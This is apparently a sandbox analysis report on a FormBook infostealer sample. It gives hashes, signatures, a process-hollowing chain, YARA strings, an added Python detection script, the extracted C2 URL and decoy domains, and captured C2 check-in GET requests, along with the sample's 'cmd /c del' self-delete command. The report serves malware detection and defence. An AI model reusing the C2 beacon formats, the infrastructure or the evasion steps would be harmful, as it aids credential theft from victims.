Analysis Report Order 122001-220 guanzo.exe

Overview

General Information

Sample Name: Order 122001-220 guanzo.exe
Analysis ID: 412023
MD5: 9e819bcc826e7a20b0fd139cc4185195
SHA1: bdb33c04403e308dcc79ced36201c577a40f0311
SHA256: 5b09da58ac487c25237bf1a8ba98988af849980d5fe92dd1ca417591b977d7a8
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Order 122001-220 guanzo.exe (PID: 864 cmdline: 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe' MD5: 9E819BCC826E7A20B0FD139CC4185195)
    • Order 122001-220 guanzo.exe (PID: 5676 cmdline: C:\Users\user\Desktop\Order 122001-220 guanzo.exe MD5: 9E819BCC826E7A20B0FD139CC4185195)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 1556 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 4700 cmdline: /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
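
The tree above is the FormBook hollowing chain: the sample relaunches itself, the copy is overwritten with the payload, explorer.exe is injected, a 32-bit Windows binary (mstsc.exe from SysWOW64) is started from it as the final host, and that host spawns cmd.exe to delete the original file. The script below is an added example, not part of the Joe Sandbox report, showing how those three relationships can be pulled out of process-creation telemetry. The events are constructed from the report's tree: PIDs, hashes and command lines are the report's; the parent of PID 864, the image paths of explorer.exe and cmd.exe, and the Sysmon-style field names are assumptions.

```python
"""Detection logic for the execution chain in the Startup section.

Added example, not part of the Joe Sandbox report. EVENTS is constructed
from the report's process tree: PIDs, MD5s and command lines are the
report's; the parent of PID 864, the image paths of explorer.exe and
cmd.exe, and the Sysmon-style field names are assumptions.
"""
import ntpath
import re

SAMPLE = r"C:\Users\user\Desktop\Order 122001-220 guanzo.exe"

EVENTS = [
    {"pid": 864, "ppid": 0, "image": SAMPLE, "cmdline": f"'{SAMPLE}'",
     "md5": "9E819BCC826E7A20B0FD139CC4185195"},
    {"pid": 5676, "ppid": 864, "image": SAMPLE, "cmdline": SAMPLE,
     "md5": "9E819BCC826E7A20B0FD139CC4185195"},
    {"pid": 3424, "ppid": 5676, "image": r"C:\Windows\explorer.exe",  # path assumed
     "cmdline": "", "md5": "AD5296B280E8F522A8A897C96BAB0E1D"},
    {"pid": 1556, "ppid": 3424, "image": r"C:\Windows\SysWOW64\mstsc.exe",
     "cmdline": r"C:\Windows\SysWOW64\mstsc.exe", "md5": "2412003BE253A515C620CE4890F3D8F3"},
    {"pid": 4700, "ppid": 1556, "image": r"C:\Windows\SysWOW64\cmd.exe",  # path assumed
     "cmdline": f"/c del '{SAMPLE}'", "md5": "F3BDBE3BB6F734E357235F4D5898582D"},
    {"pid": 808, "ppid": 4700, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "md5": "EA777DEEA782E8B4D7C7C33BBF8A4496"},
]

SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}

# "del", optional switches, then a path that may be wrapped in ' or ".
DEL_RE = re.compile(r"\bdel\b\s+(?:/\w+\s+)*['\"]?([^'\"]+?)['\"]?\s*$", re.IGNORECASE)


def is_system_image(image):
    """True when the image sits directly in one of the Windows system directories."""
    return ntpath.dirname(image).lower() in SYSTEM_DIRS


def ancestors(events, pid):
    """Parent chain of pid, nearest parent first."""
    table = {e["pid"]: e for e in events}
    chain = []
    cur = table.get(pid)
    while cur is not None and cur["ppid"] in table:
        cur = table[cur["ppid"]]
        chain.append(cur)
    return chain


def find_self_spawn(events):
    """A process re-launching its own binary (same image, same hash): in the
    report this is PID 5676, the suspended copy that gets hollowed."""
    table = {e["pid"]: e for e in events}
    return [e["pid"] for e in events
            if e["ppid"] in table
            and ntpath.normcase(table[e["ppid"]]["image"]) == ntpath.normcase(e["image"])
            and table[e["ppid"]]["md5"] == e["md5"]]


def find_system_child_of_user_binary(events):
    """A Windows system binary whose parent runs from outside the Windows
    directories: explorer.exe (3424) under the Desktop sample here."""
    table = {e["pid"]: e for e in events}
    return [e["pid"] for e in events
            if is_system_image(e["image"])
            and e["ppid"] in table
            and not is_system_image(table[e["ppid"]]["image"])]


def find_self_delete(events):
    """cmd.exe deleting the image of one of its own ancestors: the '/c del'
    that mstsc.exe spawns to remove the dropped sample. Returns (cmd pid, ancestor pid)."""
    hits = []
    for e in events:
        if ntpath.basename(e["image"]).lower() != "cmd.exe":
            continue
        m = DEL_RE.search(e["cmdline"])
        if not m:
            continue
        target = ntpath.normcase(m.group(1))
        for anc in ancestors(events, e["pid"]):
            if ntpath.normcase(anc["image"]) == target:
                hits.append((e["pid"], anc["pid"]))
                break
    return hits


def analyse(events):
    return {
        "self_spawn": find_self_spawn(events),
        "system_binary_under_user_binary": find_system_child_of_user_binary(events),
        "self_delete": find_self_delete(events),
    }


if __name__ == "__main__":
    for name, pids in analyse(EVENTS).items():
        print(f"{name}: {pids}")
```

Run stand-alone it reports self_spawn: [5676], system_binary_under_user_binary: [3424] and self_delete: [(4700, 5676)]. Two caveats for taking this to production telemetry. The sandbox draws explorer.exe under PID 5676 because it attributes injected code to the injecting process; on a live host explorer.exe is already running, so the parent-child rule never fires there and the injection has to be caught from the thread-level events the signature list names (an APC queued in another process, a thread context modified). And mstsc.exe under explorer.exe with no arguments is exactly what a user opening Remote Desktop produces, so on its own it is not a signal; the high-confidence part of the chain is a cmd.exe child of a system binary deleting the image of one of its own ancestors.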

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.uuoouu-90.store/meub/"], "decoy": ["ebookcu.com", "sherwooddaydesigns.com", "healthcarebb.com", "pixelflydesigns.com", "youtegou.net", "audiokeychin.com", "rioranchoeventscenter.com", "nickofolas.com", "comicstattoosnguns.com", "ally.tech", "paperplaneexplorer.com", "janetkk.com", "sun1981.com", "pocopage.com", "shortagegoal.com", "tbluelinux.com", "servantsheartvalet.com", "jkhushal.com", "91huangyu.com", "portlandconservatory.net", "crazyasskaren.com", "gr8.photos", "silviabiasiolipatisserie.com", "goeseo.com", "shellyluther.com", "salvemosalsuroeste.com", "technologies.email", "xn--80aasvjfhla.xn--p1acf", "dmowang.com", "mylifeusaaatworkportal.com", "electronicszap.com", "thefrankversion.com", "patricksparber.com", "m-kenterprises.com", "goodcreditcardshome.info", "shegotit.club", "nutinbutter.com", "bridgestreetresources.com", "tjanyancha.com", "qqstoneandcabinet.com", "topstitch.info", "shadyshainarae.com", "meucamarimoficial.com", "gatedless.net", "aal888.com", "tstcongo.com", "luckyladybugnailswithlisa.com", "usapersonalshopper.com", "893645tuerigjo.com", "pbjengineering.com", "katbumydbnjk.mobi", "bostonm.info", "amesshop.com", "k-9homefinders.com", "philbaileyrealestate.com", "ahxinnuojie.com", "ardougne.com", "pasteleriaruth.com", "vauvakuumettapodcast.com", "aryamakoran.com", "digitalspacepod.com", "clarkstrain.com", "plantbasedranch.com", "therapylightclub.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(18 further entries not shown)

Reading the strings: yara-signator's $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) disassembles to add ecx, eax / rdtsc / sub eax, ecx / mov [ebp-4], eax, the RDTSC delta measurement behind the "Tries to detect virtualization through RDTSC time measurements" signature. Each JPCERT/CC string is a push imm32 (68 34 1C 7B E1 is push 0xE17B1C34); the rule labels the three constants sqlite3step, sqlite3text and sqlite3blob, FormBook's hashed references to the sqlite3 calls it uses to read browser databases. The match offsets are identical in the mstsc.exe dump (process 3) and the sample's own dump (process 1), as expected when the same unpacked payload has been hollowed into both processes.

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
1.2.Order 122001-220 guanzo.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Order 122001-220 guanzo.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further entry not shown)

The .unpack offsets sit exactly 0xE00 below the .raw.unpack ones (0x77e8 versus 0x85e8, and so on for every string): the raw dump keeps the in-memory section layout, while the rebuilt .unpack PE has its sections realigned to file offsets. When you carry these offsets into a disassembler, use the raw dump's values as RVAs and the .unpack values as file offsets.

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (the configuration listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Order 122001-220 guanzo.exe | Virustotal: Detection: 62%
Source: Order 122001-220 guanzo.exe | Metadefender: Detection: 32%
Source: Order 122001-220 guanzo.exe | ReversingLabs: Detection: 65%
Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Order 122001-220 guanzo.exe | Joe Sandbox ML: detected
Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Order 122001-220 guanzo.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Order 122001-220 guanzo.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: Order 122001-220 guanzo.exe, 00000001.00000002.708808706.00000000019DF000.00000040.00000001.sdmp, mstsc.exe, 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Order 122001-220 guanzo.exe, mstsc.exe
Source: Binary string: mstsc.pdbGCTL | source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdb | source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 4x nop then pop esi | 1_2_00415838
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then pop esi | 3_2_00855838

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49724 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49724 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49724 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49726 -> 104.164.26.246:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49726 -> 104.164.26.246:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49726 -> 104.164.26.246:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 18.219.49.238:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 18.219.49.238:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 18.219.49.238:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49729 -> 162.241.62.63:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49729 -> 162.241.62.63:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49729 -> 162.241.62.63:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.uuoouu-90.store/meub/
Source: global traffic | HTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre HTTP/1.1 | Host: www.comicstattoosnguns.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected: GET /meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj HTTP/1.1 | Host: www.goeseo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nib HTTP/1.1 | Host: www.shadyshainarae.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected: GET /meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj HTTP/1.1 | Host: www.thefrankversion.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWA HTTP/1.1 | Host: www.tjanyancha.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected: GET /meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLj HTTP/1.1 | Host: www.dmowang.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected: GET /meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLj HTTP/1.1 | Host: www.pocopage.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected: GET /meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj HTTP/1.1 | Host: www.goodcreditcardshome.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox HTTP/1.1 | Host: www.pasteleriaruth.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected: GET /meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj HTTP/1.1 | Host: www.amesshop.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: Joe Sandbox View | IP Address: 198.54.117.216
Source: Joe Sandbox View | ASN Name: EGIHOSTINGUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: unknown | DNS traffic detected: queries for: www.paperplaneexplorer.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 12 May 2021 08:51:24 GMT | Content-Type: text/html | Content-Length: 867 | Connection: close | Server: Apache/2 | Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT | Accept-Ranges: bytes | Accept-Ranges: bytes | Age: 0 | Data Ascii (decoded from the captured raw bytes; a domain-parking page that frames searchvity.com):
<!DOCTYPE HTML>
<html>

    <head>
        <title>404 Error - Page Not Found</title>
        <style>
            #ad_frame{ height:800px; width:100%; }
            body{ margin:0; border: 0; padding: 0; }
        </style>
        <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
        <script type="text/javascript" language="JavaScript">
            var url = 'http://www.searchvity.com/?dn='
                + document.domain + '&pid=9POL6F2H4';

            $(document).ready(function() {
                $('#ad_frame').attr('src', url);
            });
        </script>
    </head>
    <body>
        <iframe id="ad_frame" src="http://www.searchvity.com/"
            frameborder="0" scrolling="no">

            <!-- browser does not support iframe's -->

        </iframe>
    </body>

</html>
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Order 122001-220 guanzo.exe, 00000000.00000002.672299597.0000000002541000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000002.932522691.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmp | String found in binary or memory: http://www.searchvity.com/
Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmp | String found in binary or memory: http://www.searchvity.com/?dn=
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
